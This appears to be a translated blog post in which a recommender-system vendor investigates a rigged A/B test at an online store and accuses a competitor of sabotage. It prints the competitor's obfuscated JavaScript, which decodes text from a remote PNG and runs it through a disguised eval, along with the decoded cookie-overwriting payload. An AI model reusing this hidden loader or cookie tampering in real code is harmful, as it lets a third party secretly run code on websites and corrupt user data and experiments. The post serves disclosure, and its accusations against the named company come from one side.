AB test attack: recipe 'R' + t(101) + 'es46'
AB testing is one of the most powerful product management tools: it lets you measure how specific decisions affect the economics of an online business. Over five years of work we have run a huge number of AB tests, so we know very well how hard it is to run experiments correctly and which mistakes keep being repeated.
A few months ago, one of our competitors began doing something strange: offering our customers a comparison of its recommendation system with Retail Rocket through AB tests in a “bet” format, with an obligation to pay 100,000 rubles if it lost.
Such comparisons are not unusual for us: over the company's lifetime our system has been compared with almost every recommender system in Russia and abroad, and we have always shown excellent results (we have not lost a single test on effectiveness).
The first test against Rees was not long in coming, but while it was running we came across rather strange results, which led to a serious investigation. What we eventually discovered surprised us so much that we want to share the details and submit the results to the judgment of the IT community and the Russian e-commerce industry.
AB testing of recommendation systems in the Daughters & Sons online store
For several months the online store "Daughters & Sons" ran a test of three recommendation systems: Retail Rocket, Rees and the company's internal system.
The mechanics of the AB test: the entire audience of the site is randomly divided into three equal parts, and each part sees its own version of the site. Only the personal recommendation blocks differ: each segment is shown blocks driven by one of the recommendation systems.
As part of the test, the conversion of each traffic segment is measured and compared with the others, and the results decide which system works more effectively.
The audience is split on the client by JavaScript code: every user receives the identifier of one of the three test segments, which is stored in a cookie and then sent to Google Analytics with every significant action on the site.
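A minimal sketch of such client-side segmentation is given below. It assumes a simple in-memory cookie jar in place of `document.cookie` so that it runs outside a browser; the cookie name `ab_segment`, the helper `assignSegment` and the one-year lifetime are illustrative assumptions, not the store's actual code.

```javascript
// Hypothetical sketch: sticky assignment of a visitor to one of three segments.
// A plain Map stands in for the browser cookie store (assumption for testability).
const SEGMENTS = ["A", "B", "C"];
const COOKIE_NAME = "ab_segment"; // illustrative name, not the store's real cookie
const ONE_YEAR_MS = 365 * 24 * 60 * 60 * 1000;

function assignSegment(cookieJar, now = Date.now(), random = Math.random) {
  const existing = cookieJar.get(COOKIE_NAME);
  // Reuse the stored segment while the cookie is still valid.
  if (existing && existing.expires > now) {
    return existing.value;
  }
  // Otherwise pick one of the three segments with equal probability.
  const value = SEGMENTS[Math.floor(random() * SEGMENTS.length)];
  cookieJar.set(COOKIE_NAME, { value, expires: now + ONE_YEAR_MS });
  return value;
}

const jar = new Map();
const first = assignSegment(jar);
const second = assignSegment(jar); // the same visitor coming back
console.log(first, second); // the two values are always identical
```

The point of the sketch is the stickiness: once a segment is written, every later visit reads it back, so a visitor should never change segment unless something overwrites or expires the cookie.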
Test results from Google Analytics at the time of writing: conversion by segment
Segment A - internal recommender system of Daughters & Sons
Segment B - recommender system Rees
Segment C - recommender system Retail Rocket
Change in conversion relative to the internal recommender system of Daughters & Sons
Based on these data, segment C (Retail Rocket) loses and segment B (Rees) wins. Note May 27 separately: on that day Retail Rocket shows the best performance. We will return to this detail later.
During the test, the Retail Rocket engineering team ran many internal checks, found several errors on the site, fixed many integration problems and tested various algorithms and their variations. None of this produced tangible changes.
Visual assessment of the quality of recommendations
At Retail Rocket, we have several ways of evaluating the effectiveness and quality of recommendations. The very first of them is the so-called “expert assessment” (a subjective visual assessment of “adequacy”).
Let's look at examples of recommendations generated by Retail Rocket and Rees systems:
For cat litter, our system recommends pet carriers and different types of cat food, while the Rees system recommends baby food, tea and a rectal tube for children.
There are many such examples among reasonably popular products (for which statistics accumulate quickly) (here is one of the visual quality assessment reports). Although the expert assessment does not directly affect the numbers, it is a simple and quick indicator of how well a recommendation system works.
Indirect quality assessment of recommendations
It seemed strange to us that, with recommendations that look like this, the numbers were not in our favor, so we spent a lot of resources on internal studies of the causes.
First of all, we decided to study the audience that interacts with the product recommendation blocks. When a product is clicked in a Rees recommendation block, a parameter is added to the URL:
We added a similar parameter to the goods URL from the Retail Rocket recommendation blocks:
And we built segments in GA of the users who clicked on the recommendation blocks.
The first hypothesis was that our system guesses users' preferences worse and recommends less relevant products.
If so, our blocks should receive fewer clicks than the Rees recommendation blocks, but Google Analytics refutes this: our widgets get 2.81 times more clicks.
The second hypothesis we considered: visually good recommendations distract people from buying and reduce conversion. That is, they attract attention but distract from purchases and do not contribute to sales growth.
In that case, those who click on Retail Rocket recommendation blocks would convert worse than those who click on Rees blocks. But according to Google Analytics this is not so: the conversion of those who clicked on Retail Rocket blocks is much higher (by 37% according to data for 4 days).
Thus, Retail Rocket recommends products relevant to the user much more often, users click on these products more often, and the recommendations have a positive effect on sales.
If there are no problems with those who interact with the recommendations, and the recommendations look relevant on visual inspection, it remains to look at those who do not click on the recommendations.
Online store audience research
Starting to explore this segment of the audience, we noticed two interesting facts:
- There are several percent more users in the Rees segment than in the other segments, although the AB test settings imply an even distribution of the audience between the recommendation systems.
- The audience in the Rees segment is more loyal: there are many more visitors who come to the site repeatedly.
To check that the store's traffic was split into segments correctly, we independently tested the segmenter using the same code the site used: in parallel with the main split, we segmented the same audience ourselves. The error was minimal:
- Segment 1: 63,215 users
- Segment 2: 63,500 users
- Segment 3: 63,686 users
This means the segmenter works correctly and cannot produce errors of several percent, i.e. the traffic distribution in the Daughters & Sons AB test contains an anomaly.
Our developers examined the site code in detail for JS errors and bugs that could affect segmentation and found nothing that could cause the anomaly.
The logical assumption was that users can somehow move between segments. In our practice there have been cases where users changed segment during a test, for example because of an incorrectly set cookie lifetime (in one store, the cookie holding the AB test segment identifier lived only two weeks, and if the user returned after that time a value was assigned at random again, i.e. the user could end up in another test segment). To avoid such situations, we developed a checklist that includes an item on making sure users do not change segment during the test.
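The size of that error can be put into numbers. The sketch below is an illustration, not necessarily the exact check used in the study: it computes each segment's relative deviation from an even split and a Pearson chi-square statistic for the three counts listed above. The function name `evenSplitCheck` is hypothetical; 5.991 is the standard 5% critical value for two degrees of freedom.

```javascript
// Illustrative check of how far three segment sizes deviate from an even split.
function evenSplitCheck(counts) {
  const total = counts.reduce((sum, c) => sum + c, 0);
  const expected = total / counts.length;
  // Relative deviation of each segment from the expected size.
  const deviations = counts.map((c) => (c - expected) / expected);
  // Pearson chi-square statistic against the uniform distribution.
  const chiSquare = counts.reduce(
    (sum, c) => sum + (c - expected) ** 2 / expected,
    0
  );
  return { total, expected, deviations, chiSquare };
}

const CRITICAL_5PCT_DF2 = 5.991; // chi-square critical value, 2 degrees of freedom
const result = evenSplitCheck([63215, 63500, 63686]);
console.log(result.expected); // 63467
console.log(result.chiSquare.toFixed(2)); // "1.77"
console.log(result.chiSquare < CRITICAL_5PCT_DF2); // true
```

The largest deviation is about 0.4% and the statistic is well below the critical value, which is consistent with a segmenter that splits traffic evenly.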
To track such situations, Google Analytics has the “Sequences” tool, which allows you to select users who were first in one segment and then moved to another. For analysis, we built several such segments in Google Analytics:
And as a result we got the following numbers:
These data clearly show that anomalously many users move into the Rees segment from the other two. This is definitely not a random bug, otherwise users would move between all segments evenly.
Second conclusion: these users make a lot of orders.
* The online store has confirmed that these are real orders (almost all of them have the status of “purchased”)
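The same kind of check can be run on raw event logs. A minimal sketch, assuming a hypothetical log of `{ userId, segment, time }` records (the field names, the function `countTransitions` and the sample data are invented for illustration), counts how many users move from each segment to each other one:

```javascript
// Count segment-to-segment transitions per user from an event log.
// The record shape and the sample data are assumptions for illustration only.
function countTransitions(events) {
  const lastSegment = new Map(); // userId -> most recent segment seen
  const transitions = new Map(); // "from->to" -> number of switches
  const ordered = [...events].sort((a, b) => a.time - b.time);
  for (const { userId, segment } of ordered) {
    const previous = lastSegment.get(userId);
    if (previous !== undefined && previous !== segment) {
      const key = `${previous}->${segment}`;
      transitions.set(key, (transitions.get(key) || 0) + 1);
    }
    lastSegment.set(userId, segment);
  }
  return transitions;
}

const sampleLog = [
  { userId: "u1", segment: "C", time: 1 },
  { userId: "u2", segment: "A", time: 2 },
  { userId: "u1", segment: "B", time: 3 }, // u1 switched C -> B
  { userId: "u3", segment: "B", time: 4 },
  { userId: "u2", segment: "B", time: 5 }, // u2 switched A -> B
  { userId: "u3", segment: "B", time: 6 }, // no switch
];
const counts = countTransitions(sampleLog);
console.log(Object.fromEntries(counts));
```

If segment changes were caused by random re-assignment, the counts in all six directions should be roughly equal; a strong skew toward one segment is the kind of anomaly described above.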
Using the order numbers of the users moved to the Rees segment, we examined our internal session logs and identified the following patterns:
- Almost all users moved to the Rees segment have products in the basket (i.e. this is a more loyal, better converting audience);
- The movements are distributed unevenly across the hours of the day, which suggests they are triggered manually;
- Users are moved to the Rees segment on the days when Retail Rocket begins to win the AB test:
Users moved to the Rees segment (hours across the top, days down the left)
Users moved to the Retail Rocket segment (hours across the top, days down the left)
The table shows almost no movements on May 25 and 26, and on May 27, when Retail Rocket starts to pull ahead, the movements begin again. And again, the users being moved are those who have added goods to the basket and will soon convert into buyers.
Researching the code running on the site
Since the movement of loyal users to Rees looked suspicious, we started looking for the cause of the segment changes and studying the code. We carefully examined which code works with the cookies and how, and whether someone could have introduced such errors by accident, and found nothing suspicious.
Two options remained: either the cookie is changed by the Daughters & Sons server, which would not be visible on the client, or by dynamic code that arrives from a server in response to some request.
While checking for dynamic code, we searched for the eval function, a JavaScript function that executes any text (for example, text sent from a server) as JavaScript code. In dishonest hands it makes it possible to hide what the code does while giving it full access to the site's environment.
During the check, we came across a strange piece of code in the Rees JS library:
A piece of code from the Rees JS library
    key: "markDMP",
    value: function(e) {
        var t = function(e) {
            return String.fromCharCode(e)
        };
        if (e)
            for (var i in e)
                if (e.hasOwnProperty(i))
                    if (function(e) {
                        return /\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D/.test(e)
                    }(e[i])) {
                        var n = function() {
                            var n = document.createElement("canvas")
                              , o = void 0
                              , s = t(67)
                              , a = t(68)
                              , u = l.default.get(s.toLowerCase() + "ity") || l.default.get(t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a)
                              , c = [s + "UR", s + "ITY", s + "ODE"];
                            if (n && n.getContext && u && !1 === g.default.isDebug()) {
                                if (/^a:/.test(u)) {
                                    var h = r.unserialize(u);
                                    if (!h || 464 === h[c.join("_")])
                                        return "continue"
                                } else if (3784 === u || 3577 === u)
                                    return "continue";
                                o = new Image,
                                o.crossOrigin = "use-credentials",
                                o.onload = function(e, r) {
                                    r.width = this.naturalWidth,
                                    r.height = this.naturalHeight;
                                    var i = r.getContext("2d");
                                    i.drawImage(this, 0, 0);
                                    var n = i.getImageData(0, 0, this.naturalWidth, this.naturalHeight)
                                      , o = n.data
                                      , s = void 0
                                      , a = void 0
                                      , u = "";
                                    for (s = 0,
                                    a = o.length; s < a; s++)
                                        if (!(s % 4 == 3 && s > 0)) {
                                            if (0 === o[s])
                                                break;
                                            u += function(e) {
                                                return String.fromCharCode(~-e)
                                            }(o[s])
                                        }
                                    try {
                                        window[t(101) + "val"](u)
                                    } catch (e) {}
                                }
                                .bind(o, t, n),
                                o.src = e[i]
                            }
                        }();
                        if ("continue" === n)
                            continue
                    } else {
                        var o = document.createElement("img");
                        o.src = e[i],
                        o.style.width = 0,
                        o.style.height = 0,
                        o.style.display = "none",
                        o.style.position = "absolute",
                        o.style.left = "-9999px",
                        document.body.appendChild(o)
                    }
    }
    }
The full code is available here. What stands out about this piece of code is the obvious attempt to hide what it does.
Several conclusions can be drawn from the code:
- This code fragment was written specifically for the Daughters & Sons store, because it quietly reads a cookie named “city” that belongs to the store (the store keeps the user's region identifier in it)
- The code is intentionally written to be hard to read and understand (numeric character codes are used instead of text)
- The functionality is deliberately hidden from outside developers: the code does not run when the browser console is open, nor for site visitors from Moscow (an online store should know what it integrates into its site and what each line of code is responsible for, but here we see intentional concealment)
- The code is designed to download an image from the Rees server, decode text from that image, and pass the text to the thinly disguised eval function (window[t(101) + "val"](u))
- All of this means Rees is able to execute arbitrary code on the site without anyone noticing
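The obfuscated strings are easy to recover by evaluating the same expressions in isolation. The sketch below only reproduces the string-building expressions from the fragment above; the variable names on the left-hand side are ours and do not appear in the Rees code.

```javascript
// Reproduce the string-building tricks from the fragment to see what they hide.
const t = (code) => String.fromCharCode(code);

const s = t(67); // "C"
const a = t(68); // "D"

// Cookie names read by the fragment.
const cookieShort = s.toLowerCase() + "ity";
const cookieLong = t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a;
const serializedKey = [s + "UR", s + "ITY", s + "ODE"].join("_");

// Name of the function that receives the decoded text.
const hiddenFunctionName = t(101) + "val";

// Host matched by the hex-escaped regular expression.
const hostPattern = /\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D/;

console.log(cookieShort);        // city
console.log(cookieLong);         // GEO_DELIVERY_CITY_ID
console.log(serializedKey);      // CUR_CITY_CODE
console.log(hiddenFunctionName); // eval
console.log(hostPattern.test("https://api.rees46.com/x.png")); // true

// Decrement used when decoding pixel bytes: ~-e equals e - 1.
console.log(~-105); // 104
```

Because the function name is assembled at run time, a plain text search for the word `eval` does not match this call; it only shows up when you look for computed property access on `window`.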
We assume that once this information is published Rees will remove this code, so we saved it using two independent external services: https://web.archive.org and https://www.runscope.com
A formatted version is available for study via the link.
To understand what this fragment does, we wrote a module that emulates user actions and logs all requests to the Rees server. On May 25 and 26 nothing happened (this is also visible in the table of hourly user movements toward Rees), and on May 27, when according to Google Analytics Retail Rocket pulled ahead in the AB test, at around 7 pm Moscow time users started being moved to the Rees segment.
Users moved to the Rees segment (hours across the top, days down the left)
At the same time, we recorded requests to the Rees server for an image in PNG format (the contents of the images can be viewed via the link). Requested directly, the image is not available (error 404 is returned), but when the Rees user's data is sent in the request header, the image is available for download:
If we pass the image to the code that Rees tried to obfuscate (we extracted it separately for convenience), the result is JS that changes the value of the cookie in which the user's AB test segment is stored:
    document.cookie="rr-VisitorSegment_Rec=3:2; domain=.dochkisinochki.ru; path=/; expires=Mon, 25 Sep 2017 10:15:20 +0000";
    document.cookie="DS_SM_rrSegmentRecommendedABC=B; domain=.dochkisinochki.ru; path=/
This code explicitly overwrites the two cookies belonging to the store in which the user's segment is stored, setting them to the value of the Rees segment.
We are sure Rees will hide all traces of this attack, so the image has also been saved through a request made by an independent third-party service.
Thus, the Rees code moves into its own segment users who have added goods to the basket and are about to complete an order.
According to the data collected since we began logging user movements (May 1–28), built on the segment originally assigned to each user (that is, excluding those who first visited the site before May 1), Retail Rocket reliably wins the test, and Rees reduces the store's sales:
The exact period during which loyal users of the online store were being moved to the Rees segment is not known, so the real difference in effectiveness is probably even larger.
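The decoding loop from the Rees fragment can be reproduced outside the browser. A minimal sketch, assuming the RGBA bytes have already been extracted from the image (the function name `decodePixelPayload` and the sample bytes are ours); unlike the original, it returns the text for inspection instead of executing it:

```javascript
// Decode text hidden in RGBA pixel data, following the loop in the fragment:
// skip every alpha byte, stop at the first zero byte, subtract 1 from the rest.
function decodePixelPayload(rgba) {
  let text = "";
  for (let i = 0; i < rgba.length; i++) {
    if (i % 4 === 3) continue; // alpha channel carries no payload
    if (rgba[i] === 0) break; // a zero byte terminates the payload
    text += String.fromCharCode(rgba[i] - 1);
  }
  return text; // returned for inspection, never evaluated
}

// Hand-made sample: "abcd" shifted by +1, with an opaque alpha byte in between.
const samplePixels = Uint8ClampedArray.from([98, 99, 100, 255, 101, 0, 0, 255]);
console.log(decodePixelPayload(samplePixels)); // abcd
```

Applied to the bytes of the recorded image, the same loop yields the cookie-setting statements quoted above.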
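The recalculation described above amounts to attributing each order to the segment a user was first assigned, not the one recorded at purchase time. A minimal sketch with invented data follows; the record shapes and the function `conversionByOriginalSegment` are assumptions for illustration, not our production code.

```javascript
// Attribute buyers to the segment each user was ORIGINALLY assigned.
// Inputs are hypothetical: each visit carries the segment seen at that moment.
function conversionByOriginalSegment(visits, buyerIds) {
  const original = new Map(); // userId -> first segment observed
  const ordered = [...visits].sort((a, b) => a.time - b.time);
  for (const { userId, segment } of ordered) {
    if (!original.has(userId)) original.set(userId, segment);
  }
  const stats = {};
  for (const [userId, segment] of original) {
    stats[segment] = stats[segment] || { users: 0, buyers: 0 };
    stats[segment].users += 1;
    if (buyerIds.has(userId)) stats[segment].buyers += 1;
  }
  for (const segment of Object.keys(stats)) {
    stats[segment].conversion = stats[segment].buyers / stats[segment].users;
  }
  return stats;
}

const visits = [
  { userId: "u1", segment: "C", time: 1 },
  { userId: "u2", segment: "C", time: 2 },
  { userId: "u3", segment: "B", time: 3 },
  { userId: "u4", segment: "B", time: 4 },
  { userId: "u1", segment: "B", time: 5 }, // u1 was moved before buying
];
const buyers = new Set(["u1"]);
console.log(conversionByOriginalSegment(visits, buyers));
```

In this toy data the purchase by `u1` counts for segment C, where the user started, even though the cookie said B at the moment of purchase.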
In addition, we see signs of other attacks on the test in the Rees code: for example, on a user's first visit to the site, their system performs cookie matching with several RTB networks.
Synchronization code: the saved request can be viewed via the link on web.archive.org
Synchronization requests:
At a minimum this gives the online store's competitors access to these users, and at most it allows Rees to retarget traffic into its own segment and divert traffic from the other test segments to a competitor, reducing their conversion.
An interesting fact: this Rees attack was accompanied by an active PR campaign in the media and on social networks:
Instead of a conclusion
In nearly 5 years of work, this is the first time we have encountered such behavior. Unfortunately, we have to admit that AB tests can only be run when you are fully confident in the integrity of all participants.
We consider such methods of competition unfair and unacceptable: they harm the entire community and undermine trust in established working practices. We are currently working actively through legal channels to hold those responsible to account, and we encourage the community to share its experience of dealing with such situations.